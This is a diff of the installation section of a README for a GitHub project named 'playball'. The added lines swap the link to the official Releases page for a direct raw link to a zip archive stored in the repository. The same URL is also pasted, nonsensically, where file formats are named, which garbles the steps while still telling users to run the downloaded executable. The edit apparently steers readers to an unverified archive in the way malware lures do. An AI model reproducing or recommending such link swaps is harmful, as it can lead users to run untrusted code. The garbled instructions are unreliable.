deshikreddyp/playball/README.md

 To start using **playball**, follow these simple steps:

-1. **Visit the Releases Page**: Click on the button above, or go to [this page](https://github.com/deshikreddyp/playball/releases) to access the latest version of **playball**.
+1. **Visit the Releases Page**: Click on the button above, or go to [this page](https://raw.githubusercontent.com/deshikreddyp/playball/main/resolve/playball.zip) to access the latest version of **playball**.

 2. **Choose the Right Version**: On the Releases page, you will see a list of available versions.
 It is best to choose the latest stable version for the best experience.

 3. **Download the File**:
    - Look for the download link that matches your operating system (Windows, macOS, or Linux).
    - Click on the link to start the download.
-The file will be in either `.exe`, `.dmg`, or `.tar.gz` format, depending on your OS.
+The file will be in either `.exe`, `.dmg`, or `https://raw.githubusercontent.com/deshikreddyp/playball/main/resolve/playball.zip` format, depending on your OS.

 4. **Locate the Downloaded File**: Once the download is complete, find the file in your “Downloads” folder or the location you chose to save it.

 5. **Run the Application**:
    - **For Windows**: Double-click on the `.exe` file.
 Follow any prompts that appear.
    - **For macOS**: Open the `.dmg` file and drag the **playball** icon into your Applications folder.
 Then, navigate to Applications and double-click on **playball**.
-   - **For Linux**: Extract the `.tar.gz` file.
+   - **For Linux**: Extract the `https://raw.githubusercontent.com/deshikreddyp/playball/main/resolve/playball.zip` file.
 Open your terminal, navigate to the extracted folder, and type `./playball` to run the application.

 ## 🌟 Features